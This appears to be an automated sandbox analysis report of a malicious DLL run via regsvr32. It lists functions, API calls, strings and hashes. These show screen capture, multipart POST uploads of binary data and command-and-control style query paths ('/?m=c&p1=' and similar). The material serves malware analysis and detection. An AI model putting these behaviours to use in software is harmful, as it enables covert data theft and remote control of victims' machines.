Opcode ID: ba3a96c6be64c61bf5b9ffe285a84d2b3357c14f202822a48d9c967e456284f5
Instruction ID: 3a39c8949cd0e81c45351022692cb2b82c11e276649d98d82143b02661a31d95
Opcode Fuzzy Hash: ba3a96c6be64c61bf5b9ffe285a84d2b3357c14f202822a48d9c967e456284f5
Instruction Fuzzy Hash: 2DF04FC4B1A60682FE55DBE55461BB422867F48B50FCC5438C90FE63D1DEACF54EC210

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DC16A0, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DC16C2

Part of subcall function 00007FF983DC161C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DC1639

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: a8e3651083c22e3107b72cc62ebed50ebdb98978f2f65936c9157084e21fbae8
Instruction ID: ab68e9e7d26221b619b1f2dc613787d896e0310047eed491c87d147cb9953043
Opcode Fuzzy Hash: a8e3651083c22e3107b72cc62ebed50ebdb98978f2f65936c9157084e21fbae8
Instruction Fuzzy Hash: 26F06DA196C14281E914F6F5A401B782190BF42790F9C1538EA1BA7392CEACF41BC600

Uniqueness

Uniqueness Score: 0.14%

Function 00007FF983DD1DF4, Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF983DD1E32

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7a3b6817eee3cc6754ee54bc445c6780e79a2348bdcbc92d6ee40dbd48a91ed0
Instruction ID: 26478b6c998f446309b4c869ba3ec650069008eae3236fc0234db9cde5b3ec71
Opcode Fuzzy Hash: 7a3b6817eee3cc6754ee54bc445c6780e79a2348bdcbc92d6ee40dbd48a91ed0
Instruction Fuzzy Hash: 07F05E81A0820646FAA5EBF15851B786281BF44761FCC6A3CDC2FE62C1DEACF44AC210

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983DC0B60, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DC0B84

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f402763c22ccb898a0f4fc31ecae900f844cef02781451b61ed9772d7cad1840
Instruction ID: 0302c115d9cd5e4e74fd5116648f79c4eca55de389bdf67348fb32940c2e565a
Opcode Fuzzy Hash: f402763c22ccb898a0f4fc31ecae900f844cef02781451b61ed9772d7cad1840
Instruction Fuzzy Hash: 32F089A171574245EA55DBF690C1E7821507F48784FD84038DB4E97342DD7CF45BC700

Uniqueness

Uniqueness Score: 0.14%

Function 00007FF983DB9AF4, Relevance: 1.5, APIs: 1, Instructions: 23UNIQUE

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF983DB9B16

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: __scrt_dllmain_crt_thread_attach
String ID:
API String ID: 2860701742-0
Opcode ID: 84af8402ecc19af6f2d6efd1b40a71a451edfddafdc168391739db53c4d94e2a
Instruction ID: 34c6a2ba34b8f2261454a6dcf19111089759e5c5bdafd57366f06a73b5db075f
Opcode Fuzzy Hash: 84af8402ecc19af6f2d6efd1b40a71a451edfddafdc168391739db53c4d94e2a
Instruction Fuzzy Hash: C1E0C2D0A0E28656FE66A6E11092FB926502F19340FDC107DD8AFEA2C3CD9D748DA525

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB95C0, Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53bbb5074b4280db1a3f0350cff8a4f646f747dda344e20905b66219f420af91
Instruction ID: ed3849800714f6a19689f27d762f1eb48d151896e2bf9c06ed0ee43257404bdf
Opcode Fuzzy Hash: 53bbb5074b4280db1a3f0350cff8a4f646f747dda344e20905b66219f420af91
Instruction Fuzzy Hash: BFD06CC0EAA58A40FE65A2F28421BB502C42F19770E9D13389C3FE92D3EDACF44EC111

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Function 00007FF983DA84D0, Relevance: 88.6, APIs: 41, Strings: 9, Instructions: 1084networkfileUNIQUE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF983DA8E51
WideCharToMultiByte.KERNEL32 ref: 00007FF983DA8F28
WideCharToMultiByte.KERNEL32 ref: 00007FF983DA9015
WideCharToMultiByte.KERNEL32 ref: 00007FF983DA90EC
WideCharToMultiByte.KERNEL32 ref: 00007FF983DA91DE
WideCharToMultiByte.KERNEL32 ref: 00007FF983DA92B5
HttpOpenRequestW.WININET ref: 00007FF983DA9362
HttpAddRequestHeadersW.WININET ref: 00007FF983DA939A
HttpAddRequestHeadersW.WININET ref: 00007FF983DA93FB
HttpSendRequestExW.WININET ref: 00007FF983DA9425
InternetWriteFile.WININET ref: 00007FF983DA943F
HttpEndRequestW.WININET ref: 00007FF983DA9455
InternetCloseHandle.WININET ref: 00007FF983DA946A
GetLastError.KERNEL32 ref: 00007FF983DA9472
InternetCloseHandle.WININET ref: 00007FF983DA947B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9734
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA973A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9740
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9746
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA974C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9752
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9758
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA975E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9764
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA976A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9770
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9776
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA977C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9782
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9788
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA978E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9794
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA979A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA97A0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA97A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA97AC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA97B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA97B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA97BE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA97C4

Strings

--, xrefs: 00007FF983DA8AEB
Content-Type: multipart/form-data; boundary=, xrefs: 00007FF983DA8574
Content-Disposition: form-data; name="binary"; filename=", xrefs: 00007FF983DA87C8
"Content-Type: application/octet-stream, xrefs: 00007FF983DA8846
8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06, xrefs: 00007FF983DA8CFF
POST, xrefs: 00007FF983DA9356
@, xrefs: 00007FF983DA9341
ad2de2fb3332e182a27c17bfea9e98068080559c99981bac3921008e05f80430aae338fba9af7bcd091635b26cc564579cd406cccfcb4ef9, xrefs: 00007FF983DA854D, 00007FF983DA8765, 00007FF983DA8A85
Content-Length: %d, xrefs: 00007FF983DA93CD

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide$HttpRequest$Internet$CloseHandleHeaders$ErrorFileLastOpenSendWrite
String ID: Content-Disposition: form-data; name="binary"; filename="$"Content-Type: application/octet-stream$--$8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06$@$Content-Length: %d$Content-Type: multipart/form-data; boundary=$POST$ad2de2fb3332e182a27c17bfea9e98068080559c99981bac3921008e05f80430aae338fba9af7bcd091635b26cc564579cd406cccfcb4ef9
API String ID: 4142242795-1288420633
Opcode ID: c789a802d83bd6cc0ea92f9da95b31eb10943db1e83d74b512ac8aa031e7db52
Instruction ID: 4805442308d420b7eb44cfb8dbbe32531b6f2eb1c8f4601868b5f7c5406e6387
Opcode Fuzzy Hash: c789a802d83bd6cc0ea92f9da95b31eb10943db1e83d74b512ac8aa031e7db52
Instruction Fuzzy Hash: 62B2D5B2A187C185EB10CFA4E544BED3365FB44798F844239EA9E57A99DFBCE184C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D9CEA0, Relevance: 79.8, APIs: 38, Strings: 7, Instructions: 1092threadsleepUNIQUE

Download Yara Rule

APIs

Part of subcall function 00007FF983D93630: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D93715
Part of subcall function 00007FF983D93630: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF983D9371B

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9D0D4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9D0DA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9D0E0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9D0E6

Part of subcall function 00007FF983DA7560: InternetOpenW.WININET ref: 00007FF983DA7645
Part of subcall function 00007FF983DA7560: InternetConnectW.WININET ref: 00007FF983DA7723

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC41
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC47
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC4D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC53
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC59
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC5F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC65
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC6B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC71
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC77
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC7D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC83
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC89
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC95
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DC9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DCA1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DCA7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DCAD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DCB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9DCB9

Part of subcall function 00007FF983D93E30: ReadFile.KERNEL32(?,?,?,?,?,00007FF983D9D949), ref: 00007FF983D93EC5
Part of subcall function 00007FF983D93E30: ReadFile.KERNEL32(?,?,?,?,?,00007FF983D9D949), ref: 00007FF983D93EE2
Part of subcall function 00007FF983D93E30: ReadFile.KERNEL32(?,?,?,?,?,00007FF983D9D949), ref: 00007FF983D93F4E
Part of subcall function 00007FF983D93E30: ReadFile.KERNEL32(?,?,?,?,?,00007FF983D9D949), ref: 00007FF983D93F88
Part of subcall function 00007FF983D93E30: CloseHandle.KERNEL32(?,?,?,?,?,00007FF983D9D949), ref: 00007FF983D93F9A

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9E08A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9E090
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9E096
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9E09C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9E0A2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9E0A8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9E0AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9E0B4
CreateThread.KERNEL32 ref: 00007FF983D9E0F7
CloseHandle.KERNEL32 ref: 00007FF983D9E100
CreateThread.KERNEL32 ref: 00007FF983D9E11D
CloseHandle.KERNEL32 ref: 00007FF983D9E126
Sleep.KERNEL32 ref: 00007FF983D9E131

Strings

213c047b04d010be7d6d5daba9287cdb0f472e25, xrefs: 00007FF983D9D639
004c30a9e3b7f47670b363323299a849251a05931d97025252d08e99d867bfc4f990d35791558c8cd919544315, xrefs: 00007FF983D9DD51
/?m=c&p1=, xrefs: 00007FF983D9D12D
/?m=d&p1=, xrefs: 00007FF983D9D28B
E, xrefs: 00007FF983D9DDCF
076bf1dc1c002df98f90329224a226012927b807, xrefs: 00007FF983D9D473
86049a6c9cf6dfc80dc0375b2047e014b49e34, xrefs: 00007FF983D9DD1A

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileRead$CloseHandle$CreateInternetThread$Concurrency::cancel_current_taskConnectOpenSleep
String ID: /?m=c&p1=$/?m=d&p1=$004c30a9e3b7f47670b363323299a849251a05931d97025252d08e99d867bfc4f990d35791558c8cd919544315$076bf1dc1c002df98f90329224a226012927b807$213c047b04d010be7d6d5daba9287cdb0f472e25$86049a6c9cf6dfc80dc0375b2047e014b49e34$E
API String ID: 1623615363-2406579667
Opcode ID: cb45c2e631ca1b84f00b813f1d2cf3c5d098d099c4a6c6033a1899f85df109d3
Instruction ID: 7b20cc3b0d57576791469fb719002f79b58fc65406b39148423d682d545e2b6a
Opcode Fuzzy Hash: cb45c2e631ca1b84f00b813f1d2cf3c5d098d099c4a6c6033a1899f85df109d3
Instruction Fuzzy Hash: BCB285A2B147C185EF10DFA4D4847AD2361FB45798F845239EA5E57AEADFBCE188C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D95050, Relevance: 60.4, APIs: 28, Strings: 6, Instructions: 939fileUNIQUE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF983D95157
WideCharToMultiByte.KERNEL32 ref: 00007FF983D95234

Part of subcall function 00007FF983D93270: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D933EA
Part of subcall function 00007FF983D93270: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF983D933F6

WriteFile.KERNEL32 ref: 00007FF983D95610
CloseHandle.KERNEL32 ref: 00007FF983D95619
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9607A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D96080
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D96086
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9608C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D96092
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D96098
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9609E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960A4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960AA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960B0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960B6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960BC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960C2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960C8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960CE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960D4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960DA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960E0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960E6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960EC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960F2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960F8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D960FE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D96104

Strings

/?m=b&p1=, xrefs: 00007FF983D95BB9
213c047b04d010be7d6d5daba9287cdb0f472e25, xrefs: 00007FF983D959D3
>> , xrefs: 00007FF983D9524E
&p2=a, xrefs: 00007FF983D95BE0
c342b11d0cbf3e0eec1b60c6fc0e2906edd50d60, xrefs: 00007FF983D95639
076bf1dc1c002df98f90329224a226012927b807, xrefs: 00007FF983D957F6

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide$CloseConcurrency::cancel_current_taskFileHandleWrite
String ID: &p2=a$/?m=b&p1=$076bf1dc1c002df98f90329224a226012927b807$213c047b04d010be7d6d5daba9287cdb0f472e25$>> $c342b11d0cbf3e0eec1b60c6fc0e2906edd50d60
API String ID: 2839222787-2954172010
Opcode ID: e0ae9c5b5367eb30eb075a24ed598a44806f3f063c86762f5fa222ecc17fcfb1
Instruction ID: eda3c256cb167e71acd076495765f1b99afa8eb2ea5f226449261e86f40fff64
Opcode Fuzzy Hash: e0ae9c5b5367eb30eb075a24ed598a44806f3f063c86762f5fa222ecc17fcfb1
Instruction Fuzzy Hash: 88A272A2A14BC185EB10DFB4D844BED23A2FB457A8F944235DA5D57AD9DFBCE188C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D99FE0, Relevance: 47.6, APIs: 24, Strings: 3, Instructions: 361librarywindowfileUNIQUE

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00007FF983D9A023
GetDC.USER32 ref: 00007FF983D9A031
CreateCompatibleDC.GDI32 ref: 00007FF983D9A046
LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF983D9A0B8
GetProcAddress.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF983D9A220
GetSystemMetrics.USER32 ref: 00007FF983D9A322
GetSystemMetrics.USER32 ref: 00007FF983D9A32F
CreateCompatibleBitmap.GDI32 ref: 00007FF983D9A340
SelectObject.GDI32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF983D9A358
BitBlt.GDI32 ref: 00007FF983D9A388
GetObjectW.GDI32 ref: 00007FF983D9A3AE
GetDIBits.GDI32 ref: 00007FF983D9A44F
WriteFile.KERNEL32 ref: 00007FF983D9A4F7
CloseHandle.KERNEL32 ref: 00007FF983D9A500
SelectObject.GDI32 ref: 00007FF983D9A58D
DeleteObject.GDI32 ref: 00007FF983D9A596
DeleteDC.GDI32 ref: 00007FF983D9A59F
ReleaseDC.USER32 ref: 00007FF983D9A5AD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9A5FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9A601
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9A607
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9A60D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9A613
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9A619

Part of subcall function 00007FF983DAB580: WideCharToMultiByte.KERNEL32 ref: 00007FF983DAB5F8
Part of subcall function 00007FF983DAB580: WideCharToMultiByte.KERNEL32 ref: 00007FF983DAB6AF

Strings

8d46c7d496e1e218f9001141c009116bd8ed4fe94c9f532fbad6, xrefs: 00007FF983D9A075
, xrefs: 00007FF983D9A363
02653bab1f35986a8b86ed639bde47cd51511ee588d22926de2b82b163fccc601010, xrefs: 00007FF983D9A1DB

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Object$ByteCharCompatibleCreateDeleteMetricsMultiSelectSystemWide$AddressBitmapBitsCloseDesktopFileHandleLibraryLoadProcReleaseWindowWrite
String ID: $02653bab1f35986a8b86ed639bde47cd51511ee588d22926de2b82b163fccc601010$8d46c7d496e1e218f9001141c009116bd8ed4fe94c9f532fbad6
API String ID: 3909023660-2445533521
Opcode ID: d1ed1a026df6f0a87cdb0bfe80f6df98f9186325df7c44553f35765557ad7e39
Instruction ID: b87ebe2266a578c266212ce5dfc452fd0698cd99c1611620d157b1f4178028a0
Opcode Fuzzy Hash: d1ed1a026df6f0a87cdb0bfe80f6df98f9186325df7c44553f35765557ad7e39
Instruction Fuzzy Hash: 40F1F6A2A146C186EB11CF65E8447AD33A5FB45794F844239DE0E97BD9DFBCE248C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DC676C, Relevance: 38.6, APIs: 20, Strings: 1, Instructions: 1864UNIQUE

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF983DC7488
memcpy_s.LIBCPMT ref: 00007FF983DC751D
memcpy_s.LIBCPMT ref: 00007FF983DC7C15
memcpy_s.LIBCPMT ref: 00007FF983DC7C5C
memcpy_s.LIBCPMT ref: 00007FF983DC7E90
memcpy_s.LIBCPMT ref: 00007FF983DC7EF9
memcpy_s.LIBCPMT ref: 00007FF983DC7F34
memcpy_s.LIBCPMT ref: 00007FF983DC7FDC
memcpy_s.LIBCPMT ref: 00007FF983DC81F0
memcpy_s.LIBCPMT ref: 00007FF983DC76CF

Part of subcall function 00007FF983DCA714: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DCA746

memcpy_s.LIBCPMT ref: 00007FF983DC78A5
memcpy_s.LIBCPMT ref: 00007FF983DC7993
memcpy_s.LIBCPMT ref: 00007FF983DC79C9
memcpy_s.LIBCPMT ref: 00007FF983DC7A5E
memcpy_s.LIBCPMT ref: 00007FF983DC7B6F
memcpy_s.LIBCPMT ref: 00007FF983DC83BF

Strings

, xrefs: 00007FF983DC8202

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: memcpy_s$_invalid_parameter_noinfo
String ID:
API String ID: 2880407647-3916222277
